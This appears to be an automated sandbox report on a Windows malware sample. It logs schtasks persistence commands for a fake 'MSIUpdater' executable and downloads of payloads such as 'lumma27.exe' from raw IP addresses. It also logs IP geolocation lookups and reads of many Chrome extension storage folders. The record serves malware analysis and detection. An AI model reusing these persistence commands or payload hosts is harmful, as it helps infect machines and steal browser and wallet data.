Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | March 29, 2024, 7:43 a.m. | March 29, 2024, 7:45 a.m. |
-
-
schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5 HR" /sc HOURLY /rl HIGHEST
2804 -
schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5 LG" /sc ONLOGON /rl HIGHEST
2864 -
schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee HR" /sc HOURLY /rl HIGHEST
2928 -
schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee LG" /sc ONLOGON /rl HIGHEST
2988 -
nKr51DmJ1Ent7SAqXPmZ.exe "C:\Users\test22\AppData\Local\Temp\heidipc1B682np29P\nKr51DmJ1Ent7SAqXPmZ.exe"
3056
-
Name | Response | Post-Analysis Lookup |
---|---|---|
ipinfo.io | 34.117.186.192 | |
db-ip.com | 172.67.75.166 |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49166 104.26.4.15:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=db-ip.com | 65:b1:27:2e:35:d2:f7:1f:20:04:c5:ca:ea:4e:7a:b4:69:6a:83:00 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
section | .vmp\xc2\xa4\xc2\xbb |
resource name | AFX_DIALOG_LAYOUT |
resource name | None |
suspicious_features | Connection to IP address | suspicious_request | HEAD http://5.42.66.22/crypted_de7109ba.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://5.42.66.22/crypted_de7109ba.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://193.233.132.197/lumma27.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://193.233.132.197/lumma27.exe |
request | HEAD http://5.42.66.22/crypted_de7109ba.exe |
request | GET http://5.42.66.22/crypted_de7109ba.exe |
request | HEAD http://193.233.132.197/lumma27.exe |
request | GET http://193.233.132.197/lumma27.exe |
request | GET https://db-ip.com/demo/home.php?s=175.208.134.152 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\igkpcodhieompeloncfnbekccinhapdb\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\agoakfejjabomempkjlepdflaleeobhb\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklb\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Sync Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Sync Extension Settings\agoakfejjabomempkjlepdflaleeobhb\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Sync Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Sync Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Sync Extension Settings\flpiciilemghbmfalicajoolhkkenfel\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gojhcdgcpbpfigcaejpfhfegekdgiblk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Sync Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT |
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | AFX_DIALOG_LAYOUT | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x0090ee74 | size | 0x00000002 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x00910560 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x00910560 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x00910560 | size | 0x00000144 | ||||||||||||||||||
name | RT_BITMAP | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x00910560 | size | 0x00000144 | ||||||||||||||||||
name | RT_MENU | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x00910998 | size | 0x00000308 | ||||||||||||||||||
name | RT_MENU | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x00910998 | size | 0x00000308 | ||||||||||||||||||
name | RT_DIALOG | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x009145a4 | size | 0x00000034 | ||||||||||||||||||
name | RT_DIALOG | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x009145a4 | size | 0x00000034 | ||||||||||||||||||
name | RT_DIALOG | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x009145a4 | size | 0x00000034 | ||||||||||||||||||
name | RT_DIALOG | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x009145a4 | size | 0x00000034 | ||||||||||||||||||
name | RT_DIALOG | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x009145a4 | size | 0x00000034 | ||||||||||||||||||
name | RT_DIALOG | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x009145a4 | size | 0x00000034 | ||||||||||||||||||
name | RT_DIALOG | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x009145a4 | size | 0x00000034 | ||||||||||||||||||
name | RT_DIALOG | language | LANG_KOREAN | filetype | empty | sublanguage | SUBLANG_KOREAN | offset | 0x009145a4 | size | 0x00000034 |
domain | ipinfo.io |
file | C:\Users\test22\AppData\Local\Temp\heidipc1B682np29P\KZnHsyJhX9IFJQyjXOyq.exe |
file | C:\Users\test22\AppData\Local\Temp\heidipc1B682np29P\nKr51DmJ1Ent7SAqXPmZ.exe |
cmdline | schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5 LG" /sc ONLOGON /rl HIGHEST |
cmdline | schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee HR" /sc HOURLY /rl HIGHEST |
cmdline | schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5 HR" /sc HOURLY /rl HIGHEST |
cmdline | schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee LG" /sc ONLOGON /rl HIGHEST |
file | C:\Users\test22\AppData\Local\Temp\heidipc1B682np29P\KZnHsyJhX9IFJQyjXOyq.exe |
file | C:\Users\test22\AppData\Local\Temp\heidipc1B682np29P\nKr51DmJ1Ent7SAqXPmZ.exe |
file | C:\Users\test22\AppData\Local\Temp\heidipc1B682np29P\nKr51DmJ1Ent7SAqXPmZ.exe |